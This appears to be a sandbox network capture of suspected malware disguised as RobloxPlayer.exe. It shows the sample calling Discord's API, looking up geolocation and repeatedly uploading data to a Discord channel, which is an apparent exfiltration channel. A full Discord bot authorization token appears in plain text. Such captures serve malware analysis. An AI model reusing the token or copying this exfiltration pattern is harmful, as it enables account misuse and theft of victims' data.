x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689246.789
x-ratelimit-reset-after: 1.581
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OwqGfvnM1w42lrMMm2zJPIX1pq3JL2mwshIH7rg5g6CdzFrReU9oWRzNhR5Yn8pHVxVBV37Xq9aVuu%2BVvFZ375cIERcjS%2FIR6KR4YrocBp%2BBXwUabkNdC14nNq6X"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b209cfc81b0411ef99c54236d2de1b36d7e9e990d7072a3dba447bad0f3a979f964c7c16016c8c9036b9cbfec22276d0; Expires=Fri, 25-May-2029 02:07:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=3137eb2b2f52ad8195125d8f62deb9b714b4ecb1-1716689245; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=Fi9NtVZahhTmV7Z74kDP9.LyPHSDqejBdN9DKJcrhww-1716689245318-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a3625fce3950e-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:07:29 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=b4b9c69c1b0411efab56266b9b1d97ac; Expires=Fri, 25-May-2029 02:07:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689250.722
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXzDFnLISN4TrvoJYfxxVpOAWPgYlzREdobhgpuqRznRVbcXVo8Xiz3K4ZjAlSznn4n1BedRCHpgKo0M%2FRluQS8ala%2BoI0aQq8Ni%2FoUI6JuXpqAUdbwkI04Kan%2B0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=b4b9c69c1b0411efab56266b9b1d97ac12d5b05457d8075528e9dd64a0cc05af663f0e24cccba8ab4d6d0eb4e5ef185a; Expires=Fri, 25-May-2029 02:07:29 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=ab9d622b15158a910a3f05e6cb46674cc35d0f51-1716689249; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=kCPfVqfWH91QQWADMB61.Ea9.6b0ATgpUE5FcZEMJHk-1716689249811-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a36422c729405-LHR
DNS

eu-eb2.3lift.com

Request

eu-eb2.3lift.com

IN A

Response

eu-eb2.3lift.com

IN A

76.223.111.18

eu-eb2.3lift.com

IN A

13.248.245.213
DNS

contextual.media.net

Request

contextual.media.net

IN A

Response

contextual.media.net

IN A

23.55.96.24
DNS

contextual.media.net

Request

contextual.media.net

IN A
DNS

eu-eb2.3lift.com

Request

eu-eb2.3lift.com

IN AAAA

Response
DNS

eus.rubiconproject.com

Request

eus.rubiconproject.com

IN A

Response

eus.rubiconproject.com

IN CNAME

eus.rubiconproject.com.edgekey.net

eus.rubiconproject.com.edgekey.net

IN CNAME

e8960.b.akamaiedge.net

e8960.b.akamaiedge.net

IN A

23.55.98.169
DNS

e8960.b.akamaiedge.net

Request

e8960.b.akamaiedge.net

IN A

Response

e8960.b.akamaiedge.net

IN A

23.55.98.169
DNS

e8960.b.akamaiedge.net

Request

e8960.b.akamaiedge.net

IN AAAA

Response
DNS

js-sec.indexww.com

Request

js-sec.indexww.com

IN A

Response

js-sec.indexww.com

IN A

172.64.149.180

js-sec.indexww.com

IN A

104.18.38.76
DNS

js-sec.indexww.com

Request

js-sec.indexww.com

IN A

Response

js-sec.indexww.com

IN A

172.64.149.180

js-sec.indexww.com

IN A

104.18.38.76
DNS

js-sec.indexww.com

Request

js-sec.indexww.com

IN AAAA

Response
GET

https://token.rubiconproject.com/khaos.json?gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1&us_privacy=1---

Request

GET /khaos.json?gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1&us_privacy=1--- HTTP/1.1
Host: token.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://eus.rubiconproject.com
Connection: keep-alive
Referer: https://eus.rubiconproject.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site

Response

HTTP/1.1 200 OK

P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: 0
X-RPHost: d0cea2fb47f5ddedaddf61763f0aedb4
access-control-allow-credentials: true
access-control-allow-origin: https://eus.rubiconproject.com
content-type: application/json; charset=UTF-8
content-length: 7
set-cookie: khaos=LWMWGHBZ-1K-DXYM; Max-Age=31536000; Expires=Mon, 26 May 2025 02:07:33 GMT; Path=/; Domain=.rubiconproject.com; Secure; SameSite=None
set-cookie: audit=1|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nIng5kVfe2Vrm+TmxLjGBJTsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAoy0UQ7WOU2RnitdrkiHFvxCDJREwgjo9F0B6KxwcK2DqSYiHvk+EXhcIjwkQl8CQUKqDHaP3ybrDTnLiMpRIp+JHvsONJN191EV75uxAmOVKOrY9OV9pT+kZbR46ykYxTwYAXpIaaOcebLDxiJYPEIX7Jwrujye+KANZGWRSH/TvPLx8vTQpUhA4mOfLOinlZbrtWVBSDIM4ev5ZKyz11TISUd8zF+46vpwZ2SDsMGslFmOTY8d51CKy23EGKC95fz+gjWPJhXaeLMTrDxj27MXF5LfDWupU76MSMupRb2F0lOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjlOyCXXZigKOU7IJddmKAo5Tsgl12YoCjmYPeXgd3c7PUJnyG/BLY/25MdZJGvWV+0t4i1Iq21d0=; Max-Age=31536000; Expires=Mon, 26 May 2025 02:07:33 GMT; Path=/; Domain=.rubiconproject.com; Secure; SameSite=None
DNS

acdn.adnxs.com

Request

acdn.adnxs.com

IN A

Response

acdn.adnxs.com

IN CNAME

prod.appnexus.map.fastly.net

prod.appnexus.map.fastly.net

IN A

151.101.1.108

prod.appnexus.map.fastly.net

IN A

151.101.65.108

prod.appnexus.map.fastly.net

IN A

151.101.129.108

prod.appnexus.map.fastly.net

IN A

151.101.193.108
DNS

prod.appnexus.map.fastly.net

Request

prod.appnexus.map.fastly.net

IN A

Response

prod.appnexus.map.fastly.net

IN A

151.101.1.108

prod.appnexus.map.fastly.net

IN A

151.101.65.108

prod.appnexus.map.fastly.net

IN A

151.101.129.108

prod.appnexus.map.fastly.net

IN A

151.101.193.108
DNS

prod.appnexus.map.fastly.net

Request

prod.appnexus.map.fastly.net

IN AAAA

Response
GET

https://js-sec.indexww.com/um/ixmatch.html

Request

GET /um/ixmatch.html HTTP/2.0
host: js-sec.indexww.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:07:33 GMT
content-type: text/html; charset=UTF-8
last-modified: Mon, 25 Jul 2022 19:18:19 GMT
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
cf-cache-status: HIT
age: 507
expires: Sun, 26 May 2024 06:07:33 GMT
cache-control: public, max-age=14400
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a365acd5871e6-LHR
content-encoding: gzip
DNS

108.1.101.151.in-addr.arpa

Request

108.1.101.151.in-addr.arpa

IN PTR

Response
DNS

180.149.64.172.in-addr.arpa

Request

180.149.64.172.in-addr.arpa

IN PTR

Response
DNS

contextual.media.net

Request

contextual.media.net

IN A

Response

contextual.media.net

IN A

23.55.96.24
DNS

contextual.media.net

Request

contextual.media.net

IN AAAA

Response

127.0.0.1:49816

firefox.exe
162.159.135.234:443

https://gateway.discord.gg/?v=9&encording=json

tls, http

RobloxPlayer.exe

4.7kB
72.8kB
84
99

HTTP Request

GET https://gateway.discord.gg/?v=9&encording=json

HTTP Response

101
34.160.144.191:443

content-signature-2.cdn.mozilla.net

tls

firefox.exe

2.2kB
16.4kB
21
28
34.117.188.166:443

https://contile.services.mozilla.com/v1/tiles

tls, http2

firefox.exe

1.8kB
8.2kB
15
18

HTTP Request

GET https://contile.services.mozilla.com/v1/tiles
44.237.65.238:443

shavar.services.mozilla.com

tls

firefox.exe

2.2kB
3.8kB
11
10
127.0.0.1:49824

firefox.exe
34.107.243.93:443

https://push.services.mozilla.com/

tls, http

firefox.exe

1.9kB
4.6kB
11
11

HTTP Request

GET https://push.services.mozilla.com/

HTTP Response

101
34.149.100.209:443

https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expected=%221716677862123%22

tls, http2

firefox.exe

2.9kB
36.8kB
27
47

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?collection=partitioning-exempt-urls&bucket=main&_expected=0

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/partitioning-exempt-urls/changeset?_expected=1702403047185

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expected=%221716677862123%22
34.107.243.93:443

push.services.mozilla.com

tls

firefox.exe

961 B
3.4kB
8
7
34.149.100.209:443

firefox.settings.services.mozilla.com

tls, http2

firefox.exe

1.2kB
4.1kB
10
8
142.250.187.196:443

https://www.google.com/search?client=firefox-b-d&q=how+to+check+if+im+ratted

tls, http2

firefox.exe

1.9kB
7.6kB
15
22

HTTP Request

GET https://www.google.com/search?client=firefox-b-d&q=how+to+check+if+im+ratted
34.149.100.209:443

firefox.settings.services.mozilla.com

tls

firefox.exe

1.1kB
3.9kB
12
10
162.159.137.232:443

https://discord.com/api/v9/guilds/1201970766531530822/channels

tls, http

RobloxPlayer.exe

1.1kB
5.3kB
11
12

HTTP Request

POST https://discord.com/api/v9/guilds/1201970766531530822/channels

HTTP Response

201
159.89.102.253:443

https://geolocation-db.com/json/

tls, http

RobloxPlayer.exe

894 B
4.5kB
10
10

HTTP Request

GET https://geolocation-db.com/json

HTTP Response

301

HTTP Request

GET https://geolocation-db.com/json/

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.2kB
2.9kB
8
9

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

417.3kB
8.0kB
316
118

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.1kB
2.8kB
8
9

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
216.58.204.67:443

https://id.google.com/verify/AAtmn1ZqNKaR7uwgL2n-xm5soaXg5c0BOy-wlJoF_pLsxkqbaG4tIE97gSJgnMvJFILbMNBjPp5YE6OA__L8rRZ11LJJ_T7F2h8SWhHVoUsqPUAG0A

tls, http2

firefox.exe

2.1kB
9.1kB
14
19

HTTP Request

GET https://id.google.com/verify/AAtmn1ZqNKaR7uwgL2n-xm5soaXg5c0BOy-wlJoF_pLsxkqbaG4tIE97gSJgnMvJFILbMNBjPp5YE6OA__L8rRZ11LJJ_T7F2h8SWhHVoUsqPUAG0A
216.58.212.246:443

https://i.ytimg.com/vi/aFh40zRXEaU/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3mTw7O_v4PkwZiLn9Q2s7FzLuGQBQ

tls, http2

firefox.exe

1.9kB
10.7kB
15
20

HTTP Request

GET https://i.ytimg.com/vi/aFh40zRXEaU/mqdefault.jpg?sqp=-oaymwEFCJQBEFM&rs=AMzJL3mTw7O_v4PkwZiLn9Q2s7FzLuGQBQ
142.250.179.238:443

https://play.google.com/log?format=json&hasfast=true

tls, http2

firefox.exe

3.0kB
9.0kB
16
22

HTTP Request

POST https://play.google.com/log?format=json&hasfast=true
151.101.1.140:443

https://www.reddit.com/favicon.ico

tls, http2

firefox.exe

4.7kB
204.7kB
68
158

HTTP Request

GET https://www.reddit.com/r/techsupport/comments/5cxbao/how_can_i_tell_if_ive_been_ratted/

HTTP Response

403

HTTP Request

GET https://www.reddit.com/favicon.ico

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

81.9kB
4.6kB
66
38

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
142.250.187.238:443

www.youtube.com

tls, http2

firefox.exe

1.2kB
8.0kB
10
13
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.1kB
2.9kB
8
10

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
216.58.201.98:443

https://googleads.g.doubleclick.net/pagead/id

tls, http2

firefox.exe

1.8kB
6.5kB
15
17

HTTP Request

GET https://googleads.g.doubleclick.net/pagead/id
216.58.213.6:443

https://static.doubleclick.net/instream/ad_status.js

tls, http2

firefox.exe

1.8kB
6.4kB
14
16

HTTP Request

GET https://static.doubleclick.net/instream/ad_status.js
172.217.169.42:443

https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT

tls, http2

firefox.exe

4.7kB
52.9kB
39
68

HTTP Request

OPTIONS https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

HTTP Request

POST https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create

HTTP Request

OPTIONS https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT

HTTP Request

POST https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
172.217.169.42:443

jnn-pa.googleapis.com

tls, http2

firefox.exe

1.2kB
5.7kB
10
10
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

5.0kB
3.4kB
12
12

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.1kB
2.8kB
8
9

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
104.27.206.87:443

https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/

tls, http2

firefox.exe

2.0kB
31.0kB
17
36

HTTP Request

GET https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/

HTTP Response

200
104.17.25.14:443

https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.6-rc.0/css/select2.min.css

tls, http2

firefox.exe

1.7kB
6.4kB
13
14

HTTP Request

GET https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.6-rc.0/css/select2.min.css

HTTP Response

200
172.217.16.234:443

https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js

tls, http2

firefox.exe

2.0kB
39.1kB
19
39

HTTP Request

GET https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
104.16.80.73:443

https://static.cloudflareinsights.com/beacon.min.js/vef91dfe02fce4ee0ad053f6de4f175db1715022073587

tls, http2

firefox.exe

1.7kB
